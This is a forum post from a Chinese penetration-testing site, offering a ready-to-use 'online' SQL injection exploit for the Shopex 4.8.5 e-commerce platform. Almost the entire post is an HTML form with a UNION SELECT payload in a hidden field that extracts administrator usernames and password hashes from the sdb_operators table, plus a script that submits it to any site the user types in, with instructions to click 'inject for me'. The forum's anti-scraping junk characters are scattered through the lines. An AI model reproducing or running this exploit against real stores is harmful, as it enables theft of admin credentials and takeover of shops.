中国网络渗透测试联盟

标题: Shopex 4.8.5 SQL Injection Exp 0day [打印本页]

作者: admin    时间: 2013-1-23 09:20
标题: Shopex 4.8.5 SQL Injection Exp 0day
<center>
, Q. m( J- h) C) \: K7 Q4 m( Y<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>! i8 t$ U1 B+ F7 N1 r" g
<form action="" method="post" name="submit_url">3 j7 D- V! e! u8 i
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>7 Q2 K0 p5 V' U# k0 E  Z6 P2 p
<input type="hidden" name="goods[goods_id]" value="3">
* D; j$ m' @) ]: F( R3 w<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
+ |6 h3 R2 Z2 M9 R<input type="submit" value="给我注入"  onclick=fsubmit()>2 K9 ^4 W; O: t/ S( |
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com. Q; W& y; \6 e. b2 Q

7 l6 d+ @, _0 D7 `- P; H& p<script>
3 D; h9 c4 O' ~function fsubmit(){
0 u* Q5 ^6 c0 f# tform = document.forms[0]; # `* S8 b( b6 T, ?
form.action = form.url.value+'/?product-gnotify';
5 H2 R+ v* E* J. A3 [form.submit();
/ G( {: ]' W. }; {3 H" |}
+ Q  V$ O9 J+ T7 W/ W6 S  x; v</script>
" A) w2 S6 ~+ I9 b/ H1 r




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2